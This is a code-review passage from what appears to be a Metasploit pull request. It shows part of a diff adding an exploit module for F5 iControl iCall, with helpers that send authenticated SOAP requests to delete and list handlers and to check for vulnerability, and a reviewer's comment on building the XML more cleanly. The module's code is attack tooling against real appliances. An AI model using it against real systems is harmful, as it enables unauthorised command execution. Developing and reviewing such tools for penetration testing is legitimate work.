modules/exploits/linux/http/f5_icall_cmd.rb

```diff
@@ -0,0 +1,322 @@
+    })
+    if res and res.code == 200
+      return handler_name
+    else
+      if res and res.code == 401
+        print_error('401 Unauthorized')
+      end
+      return false
+    end
+  end
+
+  def delete_handler(handler_name)
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+      xmlns:per="urn:iControl:iCall/PeriodicHandler" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <per:delete_handler soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+         <handlers xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]"  xmlns:urn="urn:iControl">
+<item>#{handler_name}</item>
+</handlers>
+      </per:delete_handler>
+   </soapenv:Body>
+</soapenv:Envelope>
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+    if res and res.code == 200
+      return true
+    else
+      if res and res.code == 401
+        print_error('401 Unauthorized')
+      end
+      return false
+    end
+  end
+
+  def handler_exists(handler_name)
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+      xmlns:per="urn:iControl:iCall/PeriodicHandler">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <per:get_list soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
+   </soapenv:Body>
+</soapenv:Envelope>
+}
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+    if res and res.code == 200 and res.body =~ /\/Common\/#{handler_name}/
+      return true
+    else
+      if res and res.code == 401
+        print_error('401 Unauthorized')
+      end
+      return false
+    end
+  end
+
+  def check
+    # strategy: we'll send a create_script request, with empty name:
+    # if everything is ok, the server return a 500 error saying it doesn't like empty names
+    # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
+    # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
+    # any other response is considered not vulnerable
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
```

Comment:
I think we generally prefer that most XML be built with something like REXML or Nokogiri.  Additionally, it looks like all of these XML blobs that you are building differ only in the contents of `<soapenv:Body>`, so there is probably a simplification to be had somewhere -- perhaps create a helper function called `build_soap(body)`, that just drops the specified contents in between the appropriate open/closing tags.